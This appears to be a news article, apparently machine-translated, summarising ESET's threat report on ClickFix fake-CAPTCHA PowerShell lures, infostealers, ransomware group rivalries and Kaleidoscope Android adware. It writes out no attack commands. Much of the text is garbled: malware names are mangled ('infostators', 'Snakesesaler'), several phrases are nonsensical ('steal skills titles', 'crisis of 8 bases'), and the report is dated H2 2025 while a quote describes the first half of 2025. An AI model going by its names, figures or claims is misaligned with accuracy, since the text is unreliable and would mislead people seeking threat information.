- Clickfix is increasingly used to install infosteralists
- The attack vector has seen an increase of 500% in the last 6 months
- Users are told to run orders in PowerShell to correct an error
The use of the clickfix attack vector has increased by 517% since the second half of 2024, making it the second most abused attack behind phishing.
The attack uses a false recaptha to encourage users to execute code in a PowerShell terminal as a “corrective” to a false error.
This makes malware and infostators on the target device download and executed, which then harvest and remove data sensitive to pirates.
Infostolers increasing
ESET’s H2 2025 threat report explains how Clickfix is abused by pirates to distribute some of the most popular malware for infostorption, including Lumma Stealer, Vidarsteller, Stealc and Danabot.
The attack vector is so effective because it is based on the use of very simple instructions to encourage users to execute complex commands in the PowerShell terminal. Many users will simply ignore or not understand the commands they run, rather focusing on the trial to correct the error.
Clickfix is generally distributed via phishing emails that will direct the user to a false website that will require recaptcha verification to access. PowerShell commands often bypass antivirus software, making it a particularly effective way to compromise devices, especially if the hacker can bring the user to do so.
In other infostealer news, ESET’s threat report shows that Snakesesaler has passed agent Tesla as the most detected infostaler. Snakesesaler was spotted to be used in a massive campaign that has targeted hundreds of EU companies to steal skills titles.
Ransomware gangs experienced an unexpected tumultuous period thanks to the intestines and rivalries between different ransomware outfits. The DragonForce group has launched a series of moving campaigns against some of the most infamous ransomware groups, including Blacklock, Mamona and Ransomware-As-A-Service Giant Ransomhub.
Although there have been major laws to apply the law against ransomware groups in recent months, including the crisis of 8 bases, it seems that the rivalries have caused the most damage to the Ransomware ecosystem.
On the phone front, the recent wave of Kaleidoscope infections increased 160%Android Adware Detections. The malware distributed in official application stores are not new, with the distribution of recent malware on the Apple App Store and Google Play Store.
However, Kaleidoscope malware used a two -stea attack method by broadcasting intrusive advertisements on the target apparatus to generate advertising revenues, while infecting target devices with a malicious twin application downloaded via a third -party application shop.
“New social engineering techniques with sophisticated mobile threats and the disruption of major infostlers, the landscape of threats in the first half of 2025 was anything but boring,” said the director of threat prevention laboratories of Jiří Kropáč.
